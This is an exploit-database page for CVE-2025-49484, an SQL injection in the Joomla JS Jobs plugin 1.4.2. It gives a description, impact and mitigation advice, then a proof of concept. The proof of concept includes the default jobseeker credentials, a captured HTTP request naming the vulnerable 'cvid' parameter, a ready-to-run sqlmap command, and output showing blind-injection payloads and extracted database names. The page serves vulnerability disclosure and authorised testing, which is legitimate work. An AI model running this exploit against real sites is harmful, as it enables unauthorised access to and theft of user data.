Skip to main content
Home/Exploits/PHP/Joomla JS Jobs plugin 1.4.2 – SQL injection
EXPLOIT HIGH (8.8)

Joomla JS Jobs plugin 1.4.2 – SQL injection

CVE ID: CVE-2025-49484
Vulnerability Type: SQL Injection
Author: Adam Wallwork
Categories: PHP WebApps

Joomla JS Jobs Plugin Vulnerability: CVE-2025-49484

The Joomla JS Jobs plugin version 1.4.2 has been identified as having a critical SQL injection vulnerability, cataloged as CVE-2025-49484. This vulnerability allows attackers to manipulate SQL queries by injecting malicious SQL code through user inputs, potentially leading to unauthorized access to sensitive data.

Technical Details

This SQL injection vulnerability arises from inadequate input validation within the JS Jobs plugin. Specifically, the flaw exists in the handling of parameters passed to SQL queries. When a user inputs data into a form that interacts with the database, the plugin fails to properly sanitize this input. As a result, an attacker can craft a specially formed input that alters the intended SQL query. For example, an attacker might input ‘ OR ‘1’=’1 into a search field, which could allow them to bypass authentication mechanisms and retrieve sensitive information from the database.

Impact

The potential consequences of exploiting this vulnerability are severe. Attackers can gain access to confidential user data, including usernames, passwords, and personal information. Furthermore, they could modify or delete database records, leading to data integrity issues and potentially crippling business operations. Organizations utilizing this plugin are at heightened risk of data breaches and compliance violations, which could result in significant financial and reputational damage.

Mitigation

To protect against CVE-2025-49484, it is crucial for organizations to upgrade to the latest version of the JS Jobs plugin, where this vulnerability has been addressed. Regularly updating all plugins and components within Joomla is a best practice that helps mitigate known vulnerabilities. Additionally, security professionals should implement web application firewalls (WAFs) to filter out malicious SQL queries before they reach the server.

Furthermore, conducting routine security assessments and penetration testing can help identify and remediate vulnerabilities before they are exploited. Educating developers about secure coding practices, including proper input validation and parameterized queries, is essential to prevent future vulnerabilities of this nature.

Proof of Concept (PoC)

request.http 
# Exploit Title: Joomla JS Jobs plugin 1.4.2 - SQL injection
# Google Dork: n/a
# Date: 07/07/2025
# Exploit Author: Adam Wallwork
# Vendor Homepage: https://joomsky.com/
# Demo: https://demo.joomsky.com/js-jobs/jm/free/
# Software Link: https://extensions.joomla.org/extension/js-jobs/
# Version: v1.4.2
# Tested on: v1.4.2


An SQL injection vulnerability exists in the JS Jobs extension (v1.4.2) via the 'cvid' parameter and is exploitable as the jobseeker user.

To exploit this vulnerability login as the jobseeker user with default credentials (jobseeker:demo) and go to 'jobseeker-controlpanel >> My Stuff >> Newest Jobs >> Newest Jobs >> Apply Now >> Apply Now' and capture the "Apply Now" request (req.txt).

HTTP Request:
```
POST /index.php?option=com_jsjobs&task=jobapply.jobapplyajax HTTP/2
Host: localhost:8080
Cookie: joomla_user_state=logged_in; 67aa5f9b49e233456b916ea62ef1447b=kjou43pssdvaa5plr84dhc8P64
Content-Length: 38
Sec-Ch-Ua-Platform: "Linux"
Accept-Language: en-GB,en;q=0.9
Sec-Ch-Ua: "Chromium";v="137", "Not/A)Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/index.php/component/jsjobs/newest-jobs?Itemid=
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

jobid=1&cvid=1&coverletterid=4&uid=460
```

Exploit:
```
sqlmap -r req.txt --dbs --batch -p cvid --dbms=mysql --threads=10
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.9.1.2#dev}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

---
Parameter: cvid (POST)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: jobid=1&cvid=(SELECT (CASE WHEN (7270=7270) THEN 1 ELSE (SELECT 6098 UNION SELECT 7386) END))&coverletterid=4&uid=460

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: jobid=1&cvid=1 AND (SELECT 6497 FROM (SELECT(SLEEP(5)))EAyv)&coverletterid=4&uid=460
---

available databases [2]:
[*] joomla_db
[*] information_schema
```

Security Disclaimer

This exploit is provided for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal and may result in severe legal consequences. Always ensure you have explicit permission before testing vulnerabilities.

sh3llz@loading:~$
Loading security modules...